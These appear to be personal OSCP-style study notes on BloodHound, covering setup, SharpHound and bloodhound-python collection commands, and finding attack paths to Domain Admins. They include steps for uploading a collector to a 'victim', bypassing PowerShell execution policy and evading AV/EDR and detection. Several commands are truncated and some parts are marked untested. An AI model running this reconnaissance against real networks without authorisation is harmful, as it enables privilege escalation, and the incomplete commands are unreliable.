BloodHound is an Active Directory (AD) reconnaissance tool that uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment and easily identify highly complex attack paths that would otherwise be impossible to quickly identify.
BloodHound is composed of a web application and ingestors (for data collection).

OSCP: Officially allowed during the exam according to the OSCP Exam FAQ
- Official Documentation (GitHub)
- BloodHound with Kali Linux: 101 (Red Teaming Experiments)
- How to Sniff Out (and Block) BloodHound Attacks (CrowdStrike)
- BloodHound (MITRE)

BloodHoundAD (GitHub) repository will be deprecated soon. Use the SpectorOps (GitHub) repository instead for the BloodHound Community Edition (BloodHound CE).
BloodHound – Web Application:
Data Collection / Ingestors:

After running BloodHound, if you find privileges like “GenericAll”, “GenericWrite”, “Write”, “WriteProperty”, “Self”, “WriteOwner”, “ForceChangePassword”, “WriteDACL”, see Active Directory ACLs/ACEs Abuse.
BloodHound – Web Application
Bloodhound depends on neo4j so that will be installed as well.
sudo apt-get install bloodhound

Overwrite install with the latest BloodHound version. This fixes the users.json not imported in BloodHound (even when in zip file).
Check for the latest release.
cd /home/kali

Seen in a demo, version of Olivier Lyak (BloodHound-linux-x64).
Or use version of Olivier Lyak (BloodHound-linux-x64), supports ADCS paths:
sudo unzip
Overwrite original files to keep appropriate permissions
cd BloodHound-linux-x64
sudo cp -R ./* /usr/lib/bloodhound/
cd ~
sudo rm -rf ~/BloodHound-linux-x64
Change the Default Password for Neo4j
sudo neo4j console
- Open a web browser and go to http://localhost:7474. Enter default credentials neo4j / neo4j.
- Enter a new password when asked.
Start BloodHound
Start neo4j, leave terminal window open
sudo neo4j console --verbose
Start Bloodhound, in another window, leave terminal window open
In BloodHound, enter:
- bolt://localhost:7687
- neo4j
- (new changed password, from installation steps)
Data import
Drag and drop the data collectors’ files in BloodHound. A box will appear with the import status for each file (.json).
Find paths
- Search for your current user account in the search box. Use the user SID from enum4linux (authenticated).
- It will appear at the center of the screen.
- Right-click on it and Set as Starting Node. Right-click and set as Owned.
- Click on it.
- Click on the Node Info tab.
- In tab Analysis, click on Find all Domain Admins.
- Right-click on the domain admins and Set as Ending Node. If used for privilege escalation, search for Administrator user and set as ending node.
- Right-click on target and Shortest Paths to Here from Owned.
- Right-click on lines/links between groups and choose “Help”. This will give information on how to abuse it.
You can also click on any other pre-built queries in the Analysis tab. Or Shortest Path from Owned Principals.
Raw Queries
See query examples: BloodHound Cypher Cheatsheet.
Return all users:
Data Collection / Ingestors
The BloodHound ingestor.
Latest version!
wget -O /home/kali/share/SharpHound.exe
Upload SharpHound.exe to the victim. Use PowerShell or Impacket.
Execute SharpHound as a domain user. If you are on a machine that is a member, but you are authenticated as a local user, but have credentials for a domain user, get a shell for that user first.
runas / cmd.exe
.\SharpHound.exe -c all
Download the zip file to Kali. Use impacket-smbserver. See Impacket.
copy \\x.x.x.x\myshare\
In BloodHound, click on Upload Data and select the .zip file.
The PowerShell ingestor, based on PowerView, makes data collection fast and simple. The collector collects many additional pieces of data which give further paths, as well as node properties for convenience.
Open a command prompt under Windows.

PowerShell by default will not allow execution of PowerShell scripts. You need to bypass the PowerShell Execution Policy first. See PowerShell for more options.
PowerShell -Exec Bypass
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethods DCOnly -NoSaveCache -Domain -RandomizeFilenames -EncryptZip

“NoSaveCache” will instruct SharpHound to NOT create the local cache file. Future enumeration will be slower than they would be with a cache file, but this will prevent SharpHound from putting the cache file on disk, which can help with AV and EDR evasion. (bloodhound-python)

Supports most, but not all BloodHound (SharpHound) features. Currently GPO local groups are not supported, all other collection methods are implemented.
- Bloodhound.Py (
- (GitHub)
This package contains a Python based ingestor for BloodHound, based on Impacket. The installation will add a command line tool bloodhound-python to your PATH. requires impacket, ldap3 and dnspython to function.
Installation – Kali Linux
sudo apt install
Installation – Python
pip install bloodhound
Installation – Windows
- Download the ZIP file from the repository on GitHub.
- Unzip the file.
cd "C:\<somepath>\"
python -h
The antivirus may remove some files while uncompressing. It will give errors like “” not found when running the script. Copy the files from the ZIP folder to the destination folder for every missing file.
bloodhound-python -h
Python based ingestor for BloodHound
For help or reporting issues, visit
- -c: Which information to collect. Supported: Group, LocalAdmin, Session, Trusts, Default (all previous), DCOnly (no computer connections), DCOM, RDP,PSRemote, LoggedOn, Container, ObjectProps, ACL, All (all except LoggedOn). You can specify more than one by separating them with a comma. (default: Default)

Use DCOnly to prevent immediate detection by connecting only to the domain controller. Default collection would connect to other computers via RPC and enumerate local groups and active sessions (large volume of data to port 445).
bloodhound-python -c DCOnly -u user01 -d --zip
bloodhound-python -c DCOnly -u user01 -p 'password' -ns -dc --zip
When using the script from GitHub on Windows:
cd "C:\<somepath>\"
python [...]
See Certipy for Active Directory Certificate Services (ADCS) enumeration that can be imported into BloodHound.
Other ingestor?

Used in a demo, no information on this injestor script…
DCOnly will contact the DC only and not local machines?
python3 -c DCOnly -u user01 -p 'password' -ns -dc --zip
python3 -c DCOnly -u user01 -d --zip
See Certipy-AD in Active Directory Enumeration. This data can be imported into BloudHound.
Other notes to cleanup…
BloodHound requires three pieces of information from an Active Directory environment in order to function:
1. Who is logged on where?
2. Who has admin rights where?
3. What users and groups belong to what groups?
4. (Optionally) What principals have control over other user and group objects?
In most instances, collecting this information does not require Administrator privileges,
and does not require executing code on remote systems.
Data Ingestion
Data ingestion is done using the BloodHound interface. The interface supports uploading
Zip files with data, as well as individual JSON files.
# Data Collection on the target host (Linux, Python script)
# Install the ingestor
sudo apt install python-pip
sudo apt update --fix-missing
pip install bloodhound
# Run the ingestor
bloodhound-python -c Default -u $USER
bloodhound-python -c Group,LocalAdmin -u $USER
Default - Performs group membership collection, domain trust collection, local admin collection, and session collection
Group - Performs group membership collection
LocalAdmin - Performs local admin collection
Session - Performs session collection
Trusts - Performs domain trust enumeration
LoggedOn - Performs privileged Session enumeration (requires local admin on the target)
ObjectProps - Performs Object Properties collection for properties such as LastLogon or PwdLastSet
All - Runs all methods above, except LoggedOn
# -k: use Kerberos
bloodhound-python -c Default -u $USER -k
# Data Collection on the target host (Windows, C# script with Powershell) - NOT TESTED!!!
Invoke-BloodHound executes collection options necessary to populate the backend
BloodHound database. With no options specified, by default it will gather all
unrolled group membership information, all reachable domain trust information,
and will gather all session/local admin data on all computers it can reach
from your current domain. All data will be exported to JSON files in the
current directory. The *-JSONFolder C:\Temp* parameter will modify the folder
that the files are output to, and -JSONPrefix domainX will prepend the specified
flag to the beginning of each output file.
For user session data without a logon domain, by default the global catalog
is used to attempt to deconflict what domain the user may be located in.
If the user exists in more than one domain in the forest, a series of weights
is used to modify the attack path likelihood. If you want to skip this global
catalog deconfliction approach, specify the -SkipGCDeconfliction flag.
# Powershell ingestor
note op here
cd c:\users\someuserhere\Downloads
powershell Get-BloodHoundData | Export-BloodHoundCSV
# Download all CSV files (group_memberships.csv, local_admins.csv, user_sessions.csv)
# Import CSV files into BloodHound
Click "Upload Data" on the right and choose the files to import
# Click on the icon left to the search bar
# Click on Queries
# Click on links, like "Find all Domain Admins" or "Find Shortest Paths to Domain Admins from Kerberoastable Users"